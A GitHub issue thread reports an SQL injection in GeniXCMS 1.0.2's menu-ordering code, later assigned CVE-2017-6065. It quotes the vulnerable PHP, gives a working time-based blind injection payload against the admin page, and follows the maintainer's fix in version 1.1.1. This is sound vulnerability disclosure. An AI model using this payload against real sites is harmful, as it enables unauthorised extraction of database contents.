Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injection vulnerability in inc/lib/Control/Backend/menus.control.php in GeniXCMS v1.0.2(latest) discovered by "ADLab of Venustech" #71

Closed
superfish9 opened this issue Feb 13, 2017 · 11 comments

Comments

Projects
None yet
3 participants
@superfish9
Copy link

commented Feb 13, 2017

inc/lib/Control/Backend/menus.control.php(line 377):

                    if (isset($alertDanger)) {
                        $data['alertDanger'] = $alertDanger;
                    } else {
                        Menus::updateMenuOrder(
                            $_POST['order']
                        );
                        $data['alertSuccess'][] = 'Menu Order Changed';
                    }

The updateMenuOrder function in inc/lib/Menus.class.php(line 364):

    public static function updateMenuOrder($vars)
    {
        foreach ($vars as $k => $v) {
            
            // print_r($v);
            $sql = array(
                        'table' => 'menus',
                        'id' => Typo::int($k),
                        'key' => $v,
                    );
            Db::update($sql);
        }
    }

The update function in inc/lib/Db.class.php(line 322):

    public static function update($vars)
    {
        if (is_array($vars)) {
            $set = '';
            foreach ($vars['key'] as $key => $val) {
                $val = self::escape($val);
                $set .= "`$key` = '$val',";
            }

            $set = substr($set, 0, -1);
            $sql = sprintf("UPDATE `%s` SET %s WHERE `id` = '%d' LIMIT 1", $vars['table'], $set, $vars['id']);
        } else {
            $sql = $vars;
        }
        if (DB_DRIVER == 'mysql') {
            mysql_query('SET CHARACTER SET utf8');
            $q = mysql_query($sql) or die(mysql_error());
        } elseif (DB_DRIVER == 'mysqli') {
            $q = self::query($sql);
        } elseif (DB_DRIVER == 'pdo') {
            $q = self::$pdo->exec($sql);
        }

        return true;
    }

We'll find that the "$key" in $set .= "$key = '$val',"; isn't be filtered, which leads to SQL injection.
PoC:
http://127.0.0.1/genixcms100/gxadmin/index.php?page=menus
POST parameters:

changeorder=1&token=YaJthps4lATcGzu81KwublEveIQWQJsTZ4EMCjNF9vDWFbHb4l02LTnxSsa55VKkMGph91SkwHXMpY99&order[0][id`%3D1 and (select * from (select(if(ascii(substr((select user()),1,1))%3D114,sleep(3),0)))a) and `name]=superfish

Don't forget to get a token first.

@semplon

This comment has been minimized.

Copy link
Owner

commented Feb 13, 2017

thank you, but this had been fixed at the latest release already. see this https://github.com/semplon/GeniXCMS/blob/master/inc/lib/Db.class.php#L322

i don't know if the fix is solve the problem, but at least please try the latest release which is 1.0.2 already.

@superfish9

This comment has been minimized.

Copy link
Author

commented Feb 13, 2017

mysql_escape_string filltered single quote, but attacker can do sql injection without single quote, like my PoC.

@superfish9 superfish9 changed the title SQL injection vulnerability in inc/lib/Control/Backend/menus.control.php in GeniXCMS v1.0.0(latest) discovered by "ADLab of Venustech" SQL injection vulnerability in inc/lib/Control/Backend/menus.control.php in GeniXCMS v1.0.2(latest) discovered by "ADLab of Venustech" Feb 13, 2017

@semplon

This comment has been minimized.

Copy link
Owner

commented Feb 13, 2017

okay, i'll do some research first.

@fgeek

This comment has been minimized.

Copy link

commented May 5, 2017

This is CVE-2017-6065.

@semplon semplon closed this Sep 5, 2017

@fgeek

This comment has been minimized.

Copy link

commented Sep 5, 2017

@semplon What release or commit fixes this vulnerability?

@semplon

This comment has been minimized.

Copy link
Owner

commented Sep 5, 2017

aahh sorry again, i think i miss this issue.
i'll reopen again

@semplon semplon reopened this Sep 5, 2017

@semplon semplon self-assigned this Sep 5, 2017

@semplon semplon added the security label Sep 5, 2017

semplon added a commit that referenced this issue Sep 5, 2017

@fgeek

This comment has been minimized.

Copy link

commented Sep 8, 2017

@semplon Could you create new release when you have completely fixed this vulnerability, thanks?

@semplon

This comment has been minimized.

Copy link
Owner

commented Sep 9, 2017

@fgeek sure, i'm still checking another bug.

@semplon

This comment has been minimized.

Copy link
Owner

commented Sep 11, 2017

Hello @fgeek, @superfish9 since You had contribute to GeniXCMS, I'll send You JetBrains Opensource License for You. Please provide me with Your email so I can send it to You.

Thanks

semplon added a commit that referenced this issue Sep 11, 2017

#71 #73 #80 #79
Security and Bug Fix
Version 1.1.1

@semplon semplon closed this Sep 11, 2017

@fgeek

This comment has been minimized.

Copy link

commented Sep 28, 2017

@semplon Thank you for the offer, but not needed. I'm just here to make the internet more safer place for everyone and improve the quality of GeniX.

@semplon

This comment has been minimized.

Copy link
Owner

commented Sep 29, 2017

okay @fgeek, i'am really appreciate all your hard work to make GeniX more secure.

Thank You

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.